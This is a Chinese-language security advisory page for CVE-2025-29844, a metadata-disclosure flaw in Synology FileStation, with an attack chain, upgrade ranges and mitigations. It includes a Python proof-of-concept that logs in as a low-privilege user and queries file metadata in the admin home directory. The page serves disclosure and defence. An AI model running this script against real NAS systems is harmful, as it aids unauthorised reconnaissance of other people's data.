CVE-2025-29844 CVSS 4.3 中危

CVE-2025-29844: Synology FileStation 文件元数据读取漏洞

披露日期: 2025-12-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-29844

漏洞类型

信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Synology FileStation

漏洞概述

CVE-2025-29844是Synology FileStation文件cgi组件中的一个信息泄露漏洞。该漏洞允许远程已认证的低权限用户读取文件的元数据和路径信息。攻击者利用此漏洞可以获取系统中敏感文件的存储位置、访问时间戳、文件大小等元数据，这些信息可能为后续攻击提供重要情报支持。由于该漏洞仅影响机密性且影响程度较低，因此CVSS评分仅为4.3（中等严重程度）。Synology已于2025年3月25日发布安全公告Synology_SA_25_04，披露了此漏洞并提供修复方案。受影响的用户应尽快升级到最新版本的DSM操作系统以消除安全风险。

技术细节

该漏洞存在于Synology DiskStation Manager (DSM) 的FileStation应用中，具体位于file cgi模块。当低权限用户通过FileStation接口访问特定文件时，系统未能正确验证用户对文件元数据的访问权限，导致攻击者可以绕过正常的权限检查获取敏感元数据信息。攻击者可以通过构造特定的HTTP请求，利用FileStation的API接口查询任意文件的元数据，包括文件路径、创建时间、修改时间、文件大小等信息。由于该漏洞需要认证才能利用，攻击场景局限于已获取系统账户的恶意内部人员或被入侵的账户。攻击者利用获取的元数据信息可以进一步规划针对NAS系统的横向移动或数据窃取攻击。

攻击链分析

STEP 1

步骤1

攻击者获取Synology NAS系统的低权限账户凭据（通过钓鱼、社会工程或其他方式）

STEP 2

步骤2

使用获取的凭据登录FileStation应用，建立有效会话

STEP 3

步骤3

构造恶意API请求，通过FileStation的file cgi接口查询目标文件的元数据

STEP 4

步骤4

系统返回文件的完整路径、创建时间、修改时间、大小等敏感元数据

STEP 5

步骤5

攻击者利用获取的元数据信息规划进一步的攻击活动，如定位敏感文件位置

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-29844 PoC - Synology FileStation Information Disclosure
# Target: Synology NAS with FileStation enabled
# Authentication required (low-privilege user sufficient)

TARGET = "https://target-synology.com"
USERNAME = "low_privilege_user"
PASSWORD = "password"

def get_sid_cookie():
    """Authenticate and get session cookie"""
    login_url = f"{TARGET}/webapi/auth.cgi?api=SYNO.API.Auth.Version6&method=login&account={USERNAME}&passwd={PASSWORD}&session=FileStation&format=sid"
    resp = requests.get(login_url)
    data = resp.json()
    if data.get('success'):
        return data['data']['sid']
    return None

def exploit_file_metadata(sid, file_path):
    """Exploit: Read file metadata via FileStation API"""
    api_url = f"{TARGET}/webapi/entry.cgi"
    params = {
        'api': 'SYNO.FileStation.List',
        'method': 'getinfo',
        'version': 2,
        'path': file_path,
        '_sid': sid
    }
    resp = requests.get(api_url, params=params)
    return resp.json()

# Example: List root directory metadata
sid = get_sid_cookie()
if sid:
    result = exploit_file_metadata(sid, '/var/services/homes/admin')
    print(json.dumps(result, indent=2))

影响范围

Synology DSM 6.2.x < 6.2.4-25556

Synology DSM 7.x < 7.2.2-72806

Synology DiskStation Manager FileStation (具体版本需参考官方公告)

防御指南

临时缓解措施

如果无法立即升级，可通过以下措施缓解风险：1) 禁用或限制FileStation功能的使用；2) 确保所有NAS账户使用强密码并启用双因素认证；3) 通过防火墙规则限制对NAS管理接口的访问，仅允许受信任的IP地址；4) 监控系统日志，关注异常的API访问行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表